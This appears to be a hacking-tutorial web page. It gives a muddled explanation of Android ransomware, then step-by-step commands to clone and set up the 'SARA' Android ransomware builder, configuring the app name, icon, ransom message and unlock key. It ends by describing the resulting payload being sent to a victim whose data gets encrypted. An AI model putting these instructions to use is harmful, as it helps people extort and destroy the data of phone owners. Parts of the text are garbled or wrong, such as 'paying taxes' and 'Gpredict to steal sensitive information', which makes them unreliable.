What is Ransomware?

Ransomware is a type of malicious software (malware) that often uses encryption to threaten the release of data or computer systems, or restrict access to data or computer systems until the victim has paid the ransom to the attacker. If the victim does not pay on time, the data will disappear permanently.

Today, ransomware attacks are commonplace. Large corporations in North America and Europe have become victims of this trend. Cyber ​​criminals target any buyer or business, and the victims come from a variety of industries.

Many government agencies, including the FBI, advise against paying taxes to avoid starting a ransomware cycle, such as Project No More Ransomware. In addition, perhaps half of the ransomware victims may have experienced repeated ransomware attacks.

Categories of Android Ransomware

1. Crypto ransomware: This ransomware group encrypts important data, documents, files, media content, etc. Scary players use cryptographic keys to lock and unlock the data, and the criminal seeks a ransom to obtain the encryption key. (A hacker may or may not provide you with an encryption key, and even if it does, there is no guarantee that it will work.)

2. ransomware lock: Hackers control the entire user interface (UI) and lock the phone. The ransomware notification stays on top of all other windows. Thus, no matter what buttons the victims push, they are unable to remove the criminals or access anything on their equipment until they pay the ransom or have the necessary technical tools to remove it.

Android ransomware like MalLocker.B and Koler.a are classic examples of locker ransomware. They lock the phone screen and display the redemption notes they claim to be legal. The messages state that users have committed online crimes and must pay a fine to gain access to their phones.

How Android Ransomware Malware Works

Android ransomware is an emerging threat. This feature on Android phones will display notifications that require immediate attention for non-disruptive users. And like many good things in life, hijackers twist this function to suit their own evil deeds in order to show the ransom notes.

The latest evolution in Android ransomware, as identified by the Microsoft 365 Defender Research Team, involves the following process:

  1. Build Notifications: Once Android ransomware is installed on the device, it starts building a notification containing the ransom notification. It uses the setCategory function (“call”) to indicate that the notification is very important and requires special privileges.
  2. Hijacking the Screen: A notification is stored on the user interface (GUI), and when a user clicks on the notification with any pre-defined scans, the API pushes the ransomware notification window using the setFullScreenIntent () functionality.
  3. Blocking the users to access anything else: As soon as the ransom caption appears on the screen, it blocks the operation of onUserLeaveHint () on an Android device. That means, even if users tap the back button to turn off captions, they will be prevented from doing so. If they attempt to use any other phone functionality, the main screen will not show you, and the top screen will remain the same with the redemption notification.

REQUIREMENTS Dependencies :

  • Java
    • Openjdk 11
  • Aapt
  • Apktool
    • Apktool 2.4.0
  • Zipalign
  • Imagemagick
  • Python3
  • Python3-pip
    • Pillow

[+] app_icon - custom icon application [+] app_name - custom name application [+] alert_title - custom alert title [+] alert_desc - custom alert description [+] key_pass - custom key for unlock devices

📹 Video 📹

camera hack

Installation Android

Install Android :

Step 1:- Fast Run Free Cloud Linux Your Android Devices read this Post & Articles how to setup & run free cloud linux

Also Read : Cloud Linux RDP Desktop Lifetime Free for Google Cloud Console

Step 2:-  Using Linux Installation Commands Step by Step

Installation Linux

Step 1:- Update and upgrade to Linux OS To avoid errors while installing Gpredict to steal sensitive information. If your Linux version does not automatically update the list of cache software after adding one, you will need to update it by typing:

 apt-get update -y && apt-get upgrade -y 

Step 2 :- Install Repository Packages

 sudo apt install git -y
 sudo apt apktool python3 python3-pip zipalign -y

Step 3 :-  Now all the dependencies have been installed on your termux and we can now install the SARA Simple Android Ransomware tool on the Linux using the command given below. The file size of this tool is very simple, just copy and paste the command below and the tool will be loaded in 10 seconds.

 git clone https://github.com/termuxhackers-id/SARA.git

Step 4 :-  Now Change your open directory to SARA Simple Android Ransomware, If you do not know the basic terms of Linux then highly recommended
 cd SARA

Step 5 :-  Then install, ransomware tool on our Linux so type the command below in our Linux terminal.
Type the command below to Set up Android Ransomware
 sudo bash install.sh

Once you execute the above command it will ask app name, app icon (png), title, and description, unlock key. so you fill in the all required details.

After making the payload sent to the victim. if the victim installs our payload all that victim data will be encrypted.

Fix Error 

How to fix any errors. Very Simple. Using Cloud Linux and Install this tool not any error

Read this Post & Articles how to setup & run Free Cloud Linux

Also Read : Cloud Linux RDP Desktop Lifetime Free for Google Cloud Console